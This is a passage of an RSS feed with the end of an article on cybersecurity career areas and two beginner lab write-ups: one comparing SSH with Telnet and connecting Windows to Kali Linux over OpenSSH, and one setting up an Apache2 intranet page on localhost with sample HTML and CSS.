hardware solutions. Examples of application security include secure coding, input validation, keeping third-party dependencies patched, web application firewalls, and encryption of data in transit and at rest.</li><li><a href="https://www.mcafee.com/enterprise/en-us/security-awareness/cloud.html">Cloud security</a> is the field of making sure resources placed in the cloud are secure. Companies and users are constantly moving more resources into the cloud, and professionals in this field need to be familiar with implementing security in that environment.</li><li><a href="https://www.kaspersky.com/resource-center/definitions/what-is-cryptography">Cryptography</a> focuses on methods of transforming information so that data is only readable or usable by authorized people. This requires familiarity with encryption, hashing and signature algorithms and, just as importantly, with how they are correctly applied.</li><li><a href="https://www.forcepoint.com/cyber-edu/critical-infrastructure-protection-cip">Critical infrastructure security</a> is the defense of physical systems that are becoming more digital and networked, such as energy grids, hospitals, water and waste systems, and even schools. Among the issues that come up are natural disasters and outages.</li></ul><h3>Governance and compliance</h3><p>It’s critical to understand the international, federal and state laws and regulations that apply to security. They have implications for the security operations of every organization. Compliance means making sure an organization enforces the required policies and continuously audits that it does so.</p><p>This is becoming an increasingly important area of work. While these roles might not require programming knowledge, they do require foundational knowledge of cybersecurity as well as of the laws and regulations that affect a particular industry.</p><h3>Risk management and threat intelligence</h3><p>No system will ever be perfect, and there will always be risk, so this area of work is about managing that risk.</p><p>How is risk managed? Through identifying risks, assessing the likelihood and potential impact of security vulnerabilities, and finding the most cost-effective and efficient security measures.</p><p>Threat intelligence is the continuous gathering of knowledge about possible attacks. Intelligence could look like knowing the motivations behind attacks, what the scale of attacks could be, and what vectors they might use. These roles often intersect with <a href="https://www.codecademy.com/catalog/subject/data-science">data science</a> and machine learning because of the need to process all this information.</p><h3>Security operations</h3><p>People who work in this area are responsible for implementing security principles, monitoring for incidents, and recovering from disasters. They work closely with everyone under the security umbrella to:</p><ul><li>Detect when something has gone wrong.</li><li>Implement preventive measures against cyber attacks.</li><li>Make sure there are backups in case a system is compromised and data is lost.</li><li>Track changes to a system.</li><li>Come up with disaster recovery plans in advance.</li><li>Create documents and organizational policies for all of the above.</li></ul><h3>Education</h3><p>Security education is a growing area in itself. This domain acknowledges that the most securely designed technologies are only as strong as the people who use them. User education teaches best practices for people to protect themselves against cyber threats. Security training also happens in large organizations, where employees are educated and updated on the organization’s security policies and practices.</p><p>This domain also includes the career development and training of new security professionals.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Differentiate SSH and Telnet and implement SSH(secure shell) in the lab]]></title>
            <link>https://medium.com/@shiblysadik/differentiate-ssh-and-telnet-and-implement-ssh-secure-shell-in-the-lab-8d1089b76838?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/8d1089b76838</guid>
            <category><![CDATA[telnet]]></category>
            <category><![CDATA[openssh-server]]></category>
            <category><![CDATA[openssh]]></category>
            <category><![CDATA[secure-shell]]></category>
            <category><![CDATA[kali-linux]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Mon, 20 Nov 2023 20:29:42 GMT</pubDate>
            <atom:updated>2023-11-20T20:29:42.086Z</atom:updated>
            <content:encoded><![CDATA[<p><strong>Abstract</strong>: In this lab we connected a Windows virtual machine and a Kali Linux host machine using OpenSSH. Here we learn about SSH and Telnet and establish a secure shell connection.</p><p><strong>Introduction</strong>: The SSH protocol, also known as Secure Shell, is a technique for secure and reliable remote login from one computer to another. It offers several options for strong authentication, and it protects the security and integrity of connections and communications with strong encryption. It is a secure alternative to unprotected login protocols (such as Telnet and rlogin) and insecure file transfer methods (such as FTP).</p><p><strong>Differentiate Between SSH and Telnet</strong><br><strong>SSH (Secure Shell):</strong></p><ul><li><strong>Security:</strong> SSH provides a secure and encrypted communication channel over an unsecured network (such as the internet).</li><li><strong>Authentication:</strong> Utilizes public-key cryptography, password authentication, or a combination for user authentication.</li><li><strong>Encryption:</strong> Encrypts the entire session, including data transfer and user credentials, ensuring confidentiality.</li><li><strong>Port:</strong> Typically uses port 22 by default.</li><li><strong>Use Case:</strong> Widely used for remote access to servers and network devices with a focus on security.</li></ul><p><strong>Telnet:</strong></p><ul><li><strong>Security:</strong> Telnet transmits data in plain text, making it vulnerable to eavesdropping and interception.</li><li><strong>Authentication:</strong> Uses simple username and password authentication, sending credentials in plain text.</li><li><strong>Encryption:</strong> Lacks encryption, exposing sensitive information during communication.</li><li><strong>Port:</strong> Typically uses port 23 by default.</li><li><strong>Use Case:</strong> Historically used for remote access but now largely replaced by more secure protocols like SSH.</li></ul><p><strong>Process:</strong></p><p><strong><em>First we need to get these devices ready for the connection.</em></strong></p><p>To install an SSH server on a Windows machine, you can use the OpenSSH for Windows package. Here are step-by-step instructions:</p><h3>Installing OpenSSH on Windows:</h3><ol><li><strong>Enable the OpenSSH Feature:</strong></li></ol><ul><li>Open the “Settings” app on your Windows machine.</li><li>Go to “Apps” &gt; “Optional Features.”</li><li>Scroll down and find “OpenSSH Server.” Click on it.</li><li>Click “Install” to enable the OpenSSH feature.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/804/1*skF5kWXfjamTdZVkR9gnmw.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/795/1*x2psfgkGlAwtho04CKFwzg.png" /><figcaption>Steps to be followed</figcaption></figure><ol start="2"><li><strong>Start the SSH Server Service:</strong></li></ol><ul><li>Open the “Services” application. You can do this by pressing Win + R, typing services.msc, and pressing Enter.</li><li>Find the “OpenSSH SSH Server” service in the list.</li><li>Right-click on it, and select “Start.”</li></ul><ol start="3"><li><strong>Configure SSH to Start Automatically:</strong></li></ol><ul><li>Right-click on the “OpenSSH SSH Server” service.</li><li>Select “Properties.”</li><li>In the “Startup type” dropdown, choose “Automatic.” This ensures that the SSH server starts automatically with Windows.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4fOLVFNXKr-962OiXPqMwQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6IBPEt2C16bMrymb_fAGeA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/795/1*x2psfgkGlAwtho04CKFwzg.png" /><figcaption>Following screenshots 3–2–1</figcaption></figure><p><strong>Now the SSH service is ready on the Windows machine. Next, Kali Linux.</strong></p><p>Kali Linux typically comes with the OpenSSH client pre-installed. If you want to set up an OpenSSH server on Kali Linux, you can follow these steps:</p><h3>Install OpenSSH Server on Kali Linux:</h3><p>Open a terminal on your Kali Linux machine and run the following command:</p><pre>$sudo apt install openssh-server</pre><p><strong>Start and enable the SSH service</strong></p><p>To check the service status we use this command:</p><pre>$sudo service ssh status</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/888/1*r8c3NbGVdmifbx9GQbO_9A.png" /></figure><p>If the service is inactive, we start it with this command:</p><pre>$sudo service ssh start</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/908/1*8acvtnIRPlgjvzuu0UhYeA.png" /></figure><p>After starting the service we check the status of OpenSSH again. Now it is running on Kali.</p><p>Now the connection between the two devices.</p><p>First we need to know the host machine’s IP address for the SSH connection. The command for this is:</p><pre>$ifconfig</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qrWWwKb4U6xjV6WTmNjtGA.png" /><figcaption>Host machine IP address</figcaption></figure><p>Now on the Windows machine I open cmd to connect to the host machine and type:</p><pre>&gt;ssh server@192.168.0.148</pre><p>The command format is:</p><p>ssh &lt;username&gt;@&lt;target_host_or_ip&gt;</p><p>Here is the connection:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kYRgr-VxebcHmVVwW9o3vQ.png" /><figcaption>Red for the command and yellow for the other machine’s cmd</figcaption></figure><p>Now we execute some commands on the host machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dllPrHAAeS3HkqQ5hYqJlw.png" /></figure><p>We executed commands over the secure shell connection. SSH can also carry other protocols, such as file transfer (SFTP/SCP) and forwarded TCP connections (for example HTTP).</p><p>To close the connection we type exit.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NI7gTMmglaTuE5_8n9330A.png" /><figcaption>Connection Closed</figcaption></figure><h4>Discussion:</h4><p><strong>1. Security Enhancement:</strong></p><ul><li>SSH, being a secure protocol, ensures that communication between the client and server is encrypted, reducing the risk of eavesdropping and unauthorized access.</li></ul><p><strong>2. Authentication Mechanisms:</strong></p><ul><li>The use of public-key cryptography and strong password authentication in SSH provides robust user authentication, enhancing the overall security posture.</li></ul><p><strong>3. Confidentiality:</strong></p><ul><li>The encryption of the entire session in SSH ensures the confidentiality of sensitive information, protecting it from potential attackers.</li></ul><p><strong>4. Port Security:</strong></p><ul><li>SSH commonly uses port 22, and by implementing it in the lab, we ensure that the chosen port is open and properly configured for secure communication.</li></ul><h4>Conclusion:</h4><p>Implementing SSH in the lab environment brings several security benefits compared to Telnet. The use of encryption, strong authentication mechanisms, and the overall security architecture of SSH make it a preferred choice for secure remote access.</p><p>By adopting SSH, organizations can mitigate the risks associated with plaintext communication and unauthorized access. The discussion highlights the importance of security protocols in ensuring the confidentiality and integrity of data during remote access scenarios.</p><p>In conclusion, SSH stands out as a more secure and reliable choice for remote access, aligning with modern security standards and best practices. As technology evolves, it becomes imperative to prioritize secure communication methods to safeguard sensitive information in both lab and production environments.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Conclusion: In conclusion, the implementation of the web server service establishes a foundational]]></title>
            <link>https://medium.com/@shiblysadik/conclusion-in-conclusion-the-implementation-of-the-web-server-service-establishes-a-foundational-dcb3c6c5b886?source=rss-79235f7f39d1------2</link>
            <guid isPermaLink="false">https://medium.com/p/dcb3c6c5b886</guid>
            <category><![CDATA[web-server]]></category>
            <category><![CDATA[apache2]]></category>
            <category><![CDATA[intranet]]></category>
            <category><![CDATA[localhost]]></category>
            <dc:creator><![CDATA[Shibly Sadik]]></dc:creator>
            <pubDate>Sun, 19 Nov 2023 17:31:12 GMT</pubDate>
            <atom:updated>2023-11-19T17:31:12.086Z</atom:updated>
            <content:encoded><![CDATA[<h3>Create and implement a web server service on localhost or an intranet.</h3><p><strong>Abstract:</strong> In this implementation we use the apache2 server on a Linux distribution. We run our web server on localhost, https://127.0.0.1. Here we use a sample web page to implement this intranet site.</p><p><strong>Introduction</strong>: The deployment of a web server service within a local host or intranet environment has become integral to facilitating seamless communication and collaboration among users. Whether for internal corporate networks or personal development environments, establishing a web server allows for the hosting and accessibility of web-based content within a closed network.</p><p><strong>Process:</strong> In this section we implement this in an organized way.</p><p>First we need to check our apache2 server status. For this:</p><pre>$sudo systemctl status apache2</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/856/1*3lB_nKGqewHGtaaiYeTpsw.png" /></figure><p>Here the status of apache2 is inactive, so we need to start the service:</p><pre>$sudo systemctl start apache2</pre><p>The interface looks like this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/856/1*cIPwBFZMxGbJmlEGZSstYA.png" /><figcaption>apache2 active</figcaption></figure><p>Now our apache2 server is active. Next we go to the web browser and type</p><p><strong>https://127.0.0.1</strong></p><p>Here is our apache2 default page:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XcKnmnSqfJlwEIh4MuO7TA.png" /><figcaption>Local host</figcaption></figure><p>Now on our intranet server we replace the default page.</p><p>Here we need to find the apache2 server’s default pages, such as index.html, style.css and script.php. After finding them we replace them with our own web design pages.</p><p>Usually these are located in <strong>/var/www/html</strong> or /var/hd_docs.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/833/1*uCn4tpcPLDELKx9MmrLd_g.png" /></figure><p>In my project it was in the <strong>/var/www/html</strong> directory. I replaced or edited the files underlined in yellow with this code.</p><p>index.html</p><pre>&lt;!DOCTYPE html&gt;<br>&lt;html lang=&quot;en&quot;&gt;<br><br>&lt;head&gt;<br>    &lt;meta charset=&quot;UTF-8&quot;&gt;<br>    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;<br>    &lt;link rel=&quot;stylesheet&quot; href=&quot;styles.css&quot;&gt;<br>    &lt;title&gt;Simple Intranet&lt;/title&gt;<br>&lt;/head&gt;<br><br>&lt;body&gt;<br>    &lt;header&gt;<br>        &lt;h1&gt;Company Intranet&lt;/h1&gt;<br>    &lt;/header&gt;<br><br>    &lt;nav&gt;<br>        &lt;ul&gt;<br>            &lt;li&gt;&lt;a href=&quot;#home&quot;&gt;Home&lt;/a&gt;&lt;/li&gt;<br>            &lt;li&gt;&lt;a href=&quot;#announcements&quot;&gt;Announcements&lt;/a&gt;&lt;/li&gt;<br>            &lt;li&gt;&lt;a href=&quot;#documents&quot;&gt;Documents&lt;/a&gt;&lt;/li&gt;<br>            &lt;li&gt;&lt;a href=&quot;#calendar&quot;&gt;Calendar&lt;/a&gt;&lt;/li&gt;<br>        &lt;/ul&gt;<br>    &lt;/nav&gt;<br><br>    &lt;main&gt;<br>        &lt;section id=&quot;home&quot;&gt;<br>            &lt;h2&gt;Welcome to our Intranet!&lt;/h2&gt;<br>            &lt;p&gt;This is a simple intranet site for internal collaboration.&lt;/p&gt;<br>        &lt;/section&gt;<br><br>        &lt;section id=&quot;announcements&quot;&gt;<br>            &lt;h2&gt;Announcements&lt;/h2&gt;<br>            &lt;ul&gt;<br>                &lt;li&gt;&lt;strong&gt;Important Announcement:&lt;/strong&gt; Lorem ipsum dolor sit amet.&lt;/li&gt;<br>                &lt;li&gt;&lt;strong&gt;New Policy:&lt;/strong&gt; Consectetur adipiscing elit.&lt;/li&gt;<br>            &lt;/ul&gt;<br>        
&lt;/section&gt;<br><br>        &lt;section id=&quot;documents&quot;&gt;<br>            &lt;h2&gt;Documents&lt;/h2&gt;<br>            &lt;ul&gt;<br>                &lt;li&gt;&lt;a href=&quot;#&quot;&gt;Employee Handbook&lt;/a&gt;&lt;/li&gt;<br>                &lt;li&gt;&lt;a href=&quot;#&quot;&gt;Meeting Minutes&lt;/a&gt;&lt;/li&gt;<br>            &lt;/ul&gt;<br>        &lt;/section&gt;<br><br>        &lt;section id=&quot;calendar&quot;&gt;<br>            &lt;h2&gt;Calendar&lt;/h2&gt;<br>            &lt;iframe src=&quot;https://calendar.google.com/calendar/embed?src=yourcalendarid&quot; style=&quot;border: 0&quot;<br>                width=&quot;800&quot; height=&quot;600&quot; frameborder=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/iframe&gt;<br>        &lt;/section&gt;<br>    &lt;/main&gt;<br><br>    &lt;footer&gt;<br>        &lt;p&gt;&amp;copy; 2023 Company Intranet&lt;/p&gt;<br>    &lt;/footer&gt;<br>&lt;/body&gt;<br><br>&lt;/html&gt;</pre><p>Style.css</p><pre>body {<br>    font-family: &#39;Arial&#39;, sans-serif;<br>    margin: 0;<br>    padding: 0;<br>}<br><br>header {<br>    background-color: #333;<br>    color: #fff;<br>    text-align: center;<br>    padding: 1em 0;<br>}<br><br>nav {<br>    background-color: #444;<br>    color: #fff;<br>    padding: 0.5em;<br>}<br><br>nav ul {<br>    list-style-type: none;<br>    margin: 0;<br>    padding: 0;<br>    display: flex;<br>    justify-content: space-around;<br>}<br><br>nav a {<br>    color: #fff;<br>    text-decoration: none;<br>}<br><br>main {<br>    padding: 1em;<br>}<br><br>section {<br>    margin-bottom: 2em;<br>}<br><br>footer {<br>    background-color: #333;<br>    color: #fff;<br>    text-align: center;<br>    padding: 1em 0;<br>}</pre><p>I edit these files. 
I gave execute permission to these files like this:</p><pre>$sudo chmod +x index.html<br><br>$sudo chmod +x style.css</pre><p>After this I restart my apache2 server like this:</p><pre>$sudo systemctl restart apache2</pre><p>Now the intranet web server looks like this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*eljv-1KwnDKHyS7aK08THg.png" /><figcaption>Intranet web server</figcaption></figure><p>Now our intranet server is ready.</p><h3>Discussion:</h3><p>The implementation of the web server service within the local host or intranet environment marks a significant stride towards enhancing internal communication and collaboration. Several key points emerge from the development and deployment of the server, providing insights into its functionality, challenges encountered, and the potential for future improvements.</p><h4>Functionality and User Experience:</h4><p>The web server successfully serves static content, presenting a user-friendly interface accessible through a web browser. The design, consisting of an index.html landing page and a styles.css stylesheet, contributes to a clean and visually appealing user experience. Users can easily navigate through sections such as &quot;Home,&quot; &quot;Announcements,&quot; &quot;Documents,&quot; and &quot;Calendar,&quot; fostering a seamless interaction with the intranet content.</p><h3>Conclusion:</h3><p>In conclusion, the implementation of the web server service establishes a foundational platform for internal collaboration within the local host or intranet environment. The project successfully achieves its primary objectives by providing a straightforward yet effective intranet solution. The integration of HTML and CSS for content presentation, along with the potential for future expansion through server-side scripting, positions the web server to evolve based on organizational needs.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/350/1*cUfB0Iga3mzfH2JAjQeIQQ.jpeg" /></figure>]]></content:encoded>
        </item>
    </channel>
</rss>